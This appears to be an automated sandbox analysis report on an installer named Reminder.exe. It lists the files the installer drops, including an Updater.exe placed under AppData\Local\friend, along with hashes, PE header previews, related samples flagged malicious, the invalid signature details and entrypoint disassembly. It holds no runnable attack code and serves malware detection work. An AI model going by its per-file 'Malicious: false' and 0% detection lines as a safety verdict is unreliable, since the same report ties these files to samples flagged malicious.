                                                                                                Preview:C:j...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................C:j.....................................
                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):29472
                                                                                                Entropy (8bit):7.042110181107409
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:BD7FEAbd+EDsIOmF+OiR9rikW/F+M9OAriXiRQU:M07sIOYRiPWkWNl9WXil
                                                                                                MD5:077CB4461A2767383B317EB0C50F5F13
                                                                                                SHA1:584E64F1D162398B7F377CE55A6B5740379C4282
                                                                                                SHA-256:8287D0E287A66EE78537C8D1D98E426562B95C50F569B92CEA9CE36A9FA57E64
                                                                                                SHA-512:B1FCB0265697561EF497E6A60FCEE99DC5EA0CF02B4010DA9F5ED93BCE88BDFEA6BFE823A017487B8059158464EA29636AAD8E5F9DD1E8B8A1B6EAAAB670E547
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                • Filename: MDE_File_Sample_7046d0b264f80a016ec10158377c7e76c395cffb.zip, Detection: malicious, Browse
                                                                                                • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                • Filename: AX3-GUI-45.exe, Detection: malicious, Browse
                                                                                                • Filename: Defender_Update_Setup_778795.exe, Detection: malicious, Browse
                                                                                                • Filename: AX3-GUI-45.exe, Detection: malicious, Browse
                                                                                                • Filename: Windows7_Activator.exe, Detection: malicious, Browse
                                                                                                • Filename: Windows7_Activator.exe, Detection: malicious, Browse
                                                                                                • Filename: Windows7_Activator.exe, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(....................4.. ?...@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp
                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):6144
                                                                                                Entropy (8bit):4.720366600008286
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                • Filename: yM3BrI8G1E, Detection: malicious, Browse
                                                                                                • Filename: MDE_File_Sample_7046d0b264f80a016ec10158377c7e76c395cffb.zip, Detection: malicious, Browse
                                                                                                • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                • Filename: SecuriteInfo.com.FileRepMalware.4445.21502.exe, Detection: malicious, Browse
                                                                                                • Filename: NETGATE Spy Emergency.exe, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\user\Desktop\Reminder.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):3366912
                                                                                                Entropy (8bit):6.530549902297875
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                                                                MD5:45CC5C19328748F850CC9FE5E65AC9F3
                                                                                                SHA1:0684E3A5003844B4AAAC819C969527FAB0C40F44
                                                                                                SHA-256:2ADA8B93B64BD935D481E40155037A9C8314A21E2C81B978AE1CE8BE06DD5A31
                                                                                                SHA-512:B1DEF09206FF2D6285830BDC90D26A08A1FAC31DE4B30CB39E438E7B4926963BE79E033FB5C6BB69D7CE7D2E9756A2764CBE703AABE6743606D079281EF5E5FC
                                                                                                Malicious:false
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):29472
                                                                                                Entropy (8bit):7.042110181107409
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:BD7FEAbd+EDsIOmF+OiR9rikW/F+M9OAriXiRQU:M07sIOYRiPWkWNl9WXil
                                                                                                MD5:077CB4461A2767383B317EB0C50F5F13
                                                                                                SHA1:584E64F1D162398B7F377CE55A6B5740379C4282
                                                                                                SHA-256:8287D0E287A66EE78537C8D1D98E426562B95C50F569B92CEA9CE36A9FA57E64
                                                                                                SHA-512:B1FCB0265697561EF497E6A60FCEE99DC5EA0CF02B4010DA9F5ED93BCE88BDFEA6BFE823A017487B8059158464EA29636AAD8E5F9DD1E8B8A1B6EAAAB670E547
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(....................4.. ?...@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):6144
                                                                                                Entropy (8bit):4.720366600008286
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\user\Desktop\Reminder.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):3366912
                                                                                                Entropy (8bit):6.530549902297875
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                                                                MD5:45CC5C19328748F850CC9FE5E65AC9F3
                                                                                                SHA1:0684E3A5003844B4AAAC819C969527FAB0C40F44
                                                                                                SHA-256:2ADA8B93B64BD935D481E40155037A9C8314A21E2C81B978AE1CE8BE06DD5A31
                                                                                                SHA-512:B1DEF09206FF2D6285830BDC90D26A08A1FAC31DE4B30CB39E438E7B4926963BE79E033FB5C6BB69D7CE7D2E9756A2764CBE703AABE6743606D079281EF5E5FC
                                                                                                Malicious:false
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):943784
                                                                                                Entropy (8bit):6.621472142472864
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
                                                                                                MD5:3F58A517F1F4796225137E7659AD2ADB
                                                                                                SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                                                                                                SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                                                                                                SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64302
                                                                                                Entropy (8bit):7.99747122128908
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:YJTbCqFC3mhFOwLah/4qYkDwlbstmcn/t/nZNYlVV:YtblFbGwLa2kElbTSF/nD8VV
                                                                                                MD5:EDC46875D90FA9CFE80F486AD11BC7E0
                                                                                                SHA1:ABFF74B6AC6C5F40DCB4265D6CB513BEAFF1D811
                                                                                                SHA-256:87C67ABEC0E2596DF376B904B05FF0D6A2B08A22D63B5B3C890AF579C03268D5
                                                                                                SHA-512:70B2012C6EE3AA2C34154A041B8656F7FC3A24B51A86ADF32DA3CB31D9D7F5F13951CFE7EBE5F94386277CB55ECE8712FCF1B7F680890A3BC1EEDE5DE32AB50F
                                                                                                Malicious:false
                                                                                                Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....k:\.....K.).9.....w.ySQ.....&...FO.O.....zo..eT..b..B..D..*.|......f....f.jR&.?-."..M.a.#a.@&:*y.V(..v..........y..............N&..'.4.N&..'.4.kC.R......%x....}...q..U-...(....%....V..?p.h......<.Y....w^.........I..E..qX...+...,.F.T.|B4.-T....4..^....a,....m...]...R..'..Jp..m....).Px)..=..6.Q...ol..=......y.jp....~..U!..DO0.N&....0.N&...4.m......P..x.5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!.ne.."Yj...=c.#..t.E....*Yt].5M".....z.8.\y..}=.~./.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o...X).H*.>. .)z.....)-^.....9.....M...#..8..x.....9.i..z.=#R.=i>0..X... M..J.......u.##....Ez....U...Z8..@u.Dj....Yu?.px........(.1.0.S..@......'E.........5.8..B.;..E..q.S...f,..Z?..O..\...#B;<qr6..pw.[D.].9.G%_...........e}! .mj..?....u..6....i]&1...e..-7(VQBo....Y..6..w.'..A..=f6w,+.?..F.tA(./...h..X.7
                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):737441
                                                                                                Entropy (8bit):6.460518108663701
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:TPQQ6hn3hZJdZGbhE8bhnuX7Uj8y++14GbAl/mI61KrpMFu:zQNxnS7GBrFx+89MFu
                                                                                                MD5:0EE424DA61DF8BF82FED4D5EE6F191F8
                                                                                                SHA1:919D40CCDF98A76991A3DB53A43A85F3939645AC
                                                                                                SHA-256:A9C83D4555F1D6B3E59EFC11EA7D6811BFC1A4324736378B166EC13F585FF5FF
                                                                                                SHA-512:4CCCF9F4F153F3E1B83ADC31E2A00057D681BCB7D321AF56B24E5299DBCA89AE311F3BBAFEB7B48268149E89A94C05F9BC61B02B860D210329F342A1286179F7
                                                                                                Malicious:false
                                                                                                Preview:C:j...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................C:j.....................................
                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):943784
                                                                                                Entropy (8bit):6.621472142472864
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
                                                                                                MD5:3F58A517F1F4796225137E7659AD2ADB
                                                                                                SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                                                                                                SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                                                                                                SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64302
                                                                                                Entropy (8bit):7.99747122128908
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:YJTbCqFC3mhFOwLah/4qYkDwlbstmcn/t/nZNYlVV:YtblFbGwLa2kElbTSF/nD8VV
                                                                                                MD5:EDC46875D90FA9CFE80F486AD11BC7E0
                                                                                                SHA1:ABFF74B6AC6C5F40DCB4265D6CB513BEAFF1D811
                                                                                                SHA-256:87C67ABEC0E2596DF376B904B05FF0D6A2B08A22D63B5B3C890AF579C03268D5
                                                                                                SHA-512:70B2012C6EE3AA2C34154A041B8656F7FC3A24B51A86ADF32DA3CB31D9D7F5F13951CFE7EBE5F94386277CB55ECE8712FCF1B7F680890A3BC1EEDE5DE32AB50F
                                                                                                Malicious:false
                                                                                                Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....k:\.....K.).9.....w.ySQ.....&...FO.O.....zo..eT..b..B..D..*.|......f....f.jR&.?-."..M.a.#a.@&:*y.V(..v..........y..............N&..'.4.N&..'.4.kC.R......%x....}...q..U-...(....%....V..?p.h......<.Y....w^.........I..E..qX...+...,.F.T.|B4.-T....4..^....a,....m...]...R..'..Jp..m....).Px)..=..6.Q...ol..=......y.jp....~..U!..DO0.N&....0.N&...4.m......P..x.5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!.ne.."Yj...=c.#..t.E....*Yt].5M".....z.8.\y..}=.~./.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o...X).H*.>. .)z.....)-^.....9.....M...#..8..x.....9.i..z.=#R.=i>0..X... M..J.......u.##....Ez....U...Z8..@u.Dj....Yu?.px........(.1.0.S..@......'E.........5.8..B.;..E..q.S...f,..Z?..O..\...#B;<qr6..pw.[D.].9.G%_...........e}! .mj..?....u..6....i]&1...e..-7(VQBo....Y..6..w.'..A..=f6w,+.?..F.tA(./...h..X.7
                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):737441
                                                                                                Entropy (8bit):6.460518108663701
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:TPQQ6hn3hZJdZGbhE8bhnuX7Uj8y++14GbAl/mI61KrpMFu:zQNxnS7GBrFx+89MFu
                                                                                                MD5:0EE424DA61DF8BF82FED4D5EE6F191F8
                                                                                                SHA1:919D40CCDF98A76991A3DB53A43A85F3939645AC
                                                                                                SHA-256:A9C83D4555F1D6B3E59EFC11EA7D6811BFC1A4324736378B166EC13F585FF5FF
                                                                                                SHA-512:4CCCF9F4F153F3E1B83ADC31E2A00057D681BCB7D321AF56B24E5299DBCA89AE311F3BBAFEB7B48268149E89A94C05F9BC61B02B860D210329F342A1286179F7
                                                                                                Malicious:false
                                                                                                Preview:C:j...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................C:j.....................................
                                                                                                Process:C:\Users\user\AppData\Local\friend\Updater.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):943784
                                                                                                Entropy (8bit):6.621472142472864
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
                                                                                                MD5:3F58A517F1F4796225137E7659AD2ADB
                                                                                                SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                                                                                                SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                                                                                                SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\user\AppData\Local\friend\Updater.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):737441
                                                                                                Entropy (8bit):6.460518108663701
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:TPQQ6hn3hZJdZGbhE8bhnuX7Uj8y++14GbAl/mI61KrpMFu:zQNxnS7GBrFx+89MFu
                                                                                                MD5:0EE424DA61DF8BF82FED4D5EE6F191F8
                                                                                                SHA1:919D40CCDF98A76991A3DB53A43A85F3939645AC
                                                                                                SHA-256:A9C83D4555F1D6B3E59EFC11EA7D6811BFC1A4324736378B166EC13F585FF5FF
                                                                                                SHA-512:4CCCF9F4F153F3E1B83ADC31E2A00057D681BCB7D321AF56B24E5299DBCA89AE311F3BBAFEB7B48268149E89A94C05F9BC61B02B860D210329F342A1286179F7
                                                                                                Malicious:false
                                                                                                Preview:C:j...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................C:j.....................................
                                                                                                Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):478
                                                                                                Entropy (8bit):4.9404427828211634
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:PKMRJpTeTeTeTeT0s+sEAFSkIrxMVlmJHaVzvv:/2fAokItULVDv
                                                                                                MD5:1D785D889CA617298A68D26DFEF974C4
                                                                                                SHA1:1CC36474033E2767B059019B12782CE558F1EA34
                                                                                                SHA-256:FE52FE8317F9F07F4AB830F6E3B1F1013BE4AA2A82DD5C86AA805648FC053230
                                                                                                SHA-512:EF34C2479BE5BA45B41584887354DE53EA15EC53EA74D57042FF57EB8A609B93DAC9A55297300C29320CE14966FB7704C9952BDC7C6E2DDD0DCA929884091CF3
                                                                                                Malicious:false
                                                                                                Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.113957348907258
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 98.04%
                                                                                                • Inno Setup installer (109748/4) 1.08%
                                                                                                • InstallShield setup (43055/19) 0.42%
                                                                                                • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                File name:Reminder.exe
                                                                                                File size:5'563'800 bytes
                                                                                                MD5:df45696ef1463f335a6cc5dc72c607d0
                                                                                                SHA1:699eaf22d81b5dd5a7177641d9a784db7dd80eb9
                                                                                                SHA256:2e29ddac4856b370c1c8e7ebc3dd90afeafddaf932b17fcf91f1150d52ee28d7
                                                                                                SHA512:9d1d6de6e66ed818f98d9f33a73679745322b0b7160ef121a5e044d47f65f19d429cfde670225828ceb242ff255b6b98e7b970df163db7903690984487d058d2
                                                                                                SSDEEP:49152:JwREDDMzUUs+Yj5/UF98c2OTe/rdHeMxWrP+beY7UY71mTgZu3hkatehPi9iH4fV:JwREQUUhU5/UTD2OTadMwZg1kasJioHI
                                                                                                TLSH:0346B0AD7FE6C115C01C057A0AF1DE70C8E22E21DCD1A59DA2E4BD3966637CE452E22F
                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                Icon Hash:0c0c2d33ceec80aa
                                                                                                Entrypoint:0x4a83bc
                                                                                                Entrypoint Section:.itext
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:6
                                                                                                OS Version Minor:1
                                                                                                File Version Major:6
                                                                                                File Version Minor:1
                                                                                                Subsystem Version Major:6
                                                                                                Subsystem Version Minor:1
                                                                                                Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                                                                                Signature Valid:false
                                                                                                Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                Error Number:-2146869232
                                                                                                Not Before, Not After
                                                                                                • 14/04/2023 01:00:00 14/04/2025 00:59:59
                                                                                                Subject Chain
                                                                                                • CN=Greatis Software LLC, O=Greatis Software LLC, S=New York, C=US, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Wyoming, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=2022-001091494
                                                                                                Version:3
                                                                                                Thumbprint MD5:CC54E1F0D3FF37BE8B3B36C619DD2EB1
                                                                                                Thumbprint SHA-1:7C7C974D4051160F41AB50E9A0F30943466F97EA
                                                                                                Thumbprint SHA-256:8C4C4BD8924C54CD99EB29F77505E7921F4A752E565570B433FF83C75F8A5909
                                                                                                Serial:0DA3BB19EB0FCFEF5DF67F2C9086913F
                                                                                                Instruction
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                add esp, FFFFFFA4h
                                                                                                push ebx
                                                                                                push esi
                                                                                                push edi
                                                                                                xor eax, eax
                                                                                                mov dword ptr [ebp-3Ch], eax
                                                                                                mov dword ptr [ebp-40h], eax
                                                                                                mov dword ptr [ebp-5Ch], eax
                                                                                                mov dword ptr [ebp-30h], eax
                                                                                                mov dword ptr [ebp-38h], eax
                                                                                                mov dword ptr [ebp-34h], eax
                                                                                                mov dword ptr [ebp-2Ch], eax
                                                                                                mov dword ptr [ebp-28h], eax
                                                                                                mov dword ptr [ebp-14h], eax
                                                                                                mov eax, 004A2EBCh
                                                                                                call 00007FDCC561FF05h
                                                                                                xor eax, eax
                                                                                                push ebp
                                                                                                push 004A8AC1h
                                                                                                push dword ptr fs:[eax]
                                                                                                mov dword ptr fs:[eax], esp
                                                                                                xor edx, edx
                                                                                                push ebp
                                                                                                push 004A8A7Bh
                                                                                                push dword ptr fs:[edx]
                                                                                                mov dword ptr fs:[edx], esp
                                                                                                mov eax, dword ptr [004B0634h]
                                                                                                call 00007FDCC56B188Bh
                                                                                                call 00007FDCC56B13DEh
                                                                                                lea edx, dword ptr [ebp-14h]
                                                                                                xor eax, eax
                                                                                                call 00007FDCC56AC0B8h
                                                                                                mov edx, dword ptr [ebp-14h]
                                                                                                mov eax, 004B41F4h
                                                                                                call 00007FDCC5619FB3h
                                                                                                push 00000002h
                                                                                                push 00000000h
                                                                                                push 00000001h
                                                                                                mov ecx, dword ptr [004B41F4h]
                                                                                                mov dl, 01h
                                                                                                mov eax, dword ptr [0049CD14h]
                                                                                                call 00007FDCC56AD3E3h
                                                                                                mov dword ptr [004B41F8h], eax
                                                                                                xor edx, edx
                                                                                                push ebp
                                                                                                push 004A8A27h
                                                                                                push dword ptr fs:[edx]
                                                                                                mov dword ptr fs:[edx], esp
                                                                                                call 00007FDCC56B1913h
                                                                                                mov dword ptr [004B4200h], eax
                                                                                                mov eax, dword ptr [004B4200h]
                                                                                                cmp dword ptr [eax+0Ch], 01h
                                                                                                jne 00007FDCC56B85FAh
                                                                                                mov eax, dword ptr [004B4200h]
                                                                                                mov edx, 00000028h
                                                                                                call 00007FDCC56ADCD8h
                                                                                                mov edx, dword ptr [004B4200h]
                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x54bc000x2998
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
